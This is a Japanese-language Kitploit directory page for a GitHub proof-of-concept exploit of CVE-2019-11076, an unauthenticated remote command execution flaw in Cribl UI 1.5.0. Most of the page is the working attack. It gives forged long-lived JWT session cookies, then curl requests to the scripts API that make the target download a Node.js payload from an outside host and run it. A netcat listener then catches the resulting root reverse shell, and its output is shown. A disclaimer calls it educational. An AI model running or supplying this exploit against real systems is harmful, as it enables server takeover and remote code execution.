Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
poc-cribl-rce — CVE-2019-11076 - Cribl UI 1.5.0 は、認証されていない Web リクエストを介してリモート攻撃者が任意のコマンドを実行することを可能にします。 | Kitploit
ツール/GitHubGitHub/livehybrid/poc-cribl-rce
ペイロード生成エクスプロイトウェブアプリケーション悪用コマンド&コントロール認証リモートアクセスツール
GitHublivehybrid/poc-cribl-rce

poc-cribl-rce

CVE-2019-11076 - Cribl UI 1.5.0 は、認証されていない Web リクエストを介してリモート攻撃者が任意のコマンドを実行することを可能にします。

リポジトリを見る
8117年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

免責事項

これは情報提供および教育目的のみのものです。
本内容は、ツールのセキュリティ上の脆弱性を実証し、ベンダーによる修正を確認するために作成されました。

情報

Cribl v1.5.0 でテスト済み。以前のバージョンは未テストですが、脆弱である可能性があります。
有効なJWTトークンを別のCriblインスタンスのセッションに転送・注入することで、ユーザーに不正アクセスを許可する可能性があります。
さらに、JWT/セッションの生成に使用される暗号鍵を用いると、任意のユーザー名に対して有効で、有効期限を延長したセッションを作成できます。

これと、Cribl内でスクリプトを実行できる機能を組み合わせることで、リモート攻撃者がCriblインスタンス上で悪意のあるコードを実行し、さらに制御を奪うことが可能になります。
以下にその例を示します。スクリプトページと有効期限の長いJWTトークンを使用して、リバースシェルを作成することができました。

Docker(Alpine)を使用してテスト。

実行

まず、(リモートホスト名)を修正し、shell.js を Web サーバーにアップロードします。このファイルには、あなたの Web サイトへのリバースシェルを作成する NodeJS コードが含まれています。
サーバーは、あなたのリモートホスト/ポートへのアウトバウンドネットワークアクセスを持っている必要があります。

次に、リモートホスト上で shell.js に合致するポートでリスナーを設定します。

root@kitploit:~
nc -lvp 6669

以下の curl コマンドをあなたのリモートファイルに合わせて調整してください。
CURL コマンドを順番に実行してください。出力は以下のインデントとおおよそ一致するはずです。

root@kitploit:~
curl 'http://CRIBL_URL:9000/api/v1/system/scripts' \
-H 'Content-Type: application/json' \
-H 'Cookie: cribl_auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjo5OTk5OTk5OTk5fQ.lnXNKawtPIvfUR8D6RzrU5U1-_AHuPP1StShu4XiIFY' \
--data-binary '{"id":"runme","command":"/usr/bin/wget","args":["http://yourURL/cribl.js","-P","/opt"],"env":{}}' --compressed

"count":1,"items":[{"command":"/usr/bin/wget","args":["http://yourURL/cribl.js","-P","/opt"],"env":{},"id":"runme"}]}

root@kitploit:~
curl 'http://CRIBL_URL:9000/api/v1/system/scripts/runme/run' \
-H 'Content-Type: application/json' \
-H 'Cookie: cribl_auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNTU0OTUyMTU5fQ.W4YDcUJhshv2R25UcumlP4H-2vaCIiJL0hME4eZFIW0' \
--data-binary '{}' --compressed

{"pid":414,"stdout":"N/A","stderr":"N/A"}

root@kitploit:~
curl 'http://CRIBL_URL:9000/api/v1/system/scripts' \
 -H 'Content-Type: application/json'\
 -H 'Cookie: cribl_auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjo5OTk5OTk5OTk5fQ.lnXNKawtPIvfUR8D6RzrU5U1-_AHuPP1StShu4XiIFY' \
--data-binary '{"id":"reverseit","command":"node","args":["/opt/cribl.js"],"env":{}}' --compressed

"count":1,"items":[{"command":"node","args":["/opt/cribl.js"],"env":{},"id":"reverseit"}]}

root@kitploit:~
curl 'http://CRIBL_URL:9000/api/v1/system/scripts/reverseit/run' \
-H 'Cookie: cribl_auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjo5OTk5OTk5OTk5fQ.lnXNKawtPIvfUR8D6RzrU5U1-_AHuPP1StShu4XiIFY' \
--data-binary '{}' --compressed

{"pid":353,"stdout":"N/A","stderr":"N/A"}

出力

root@kitploit:~
Listening on [0.0.0.0] (family 0, port 6669)  
Connection from [188.29.XXX.XXX] port 6669 [tcp/*] accepted (family 2, sport 13720)  
> whoami  
< root  
  
> ls /  
< bin  
< dev  
< etc  
< home  
< lib  
...
ツールをダウンロード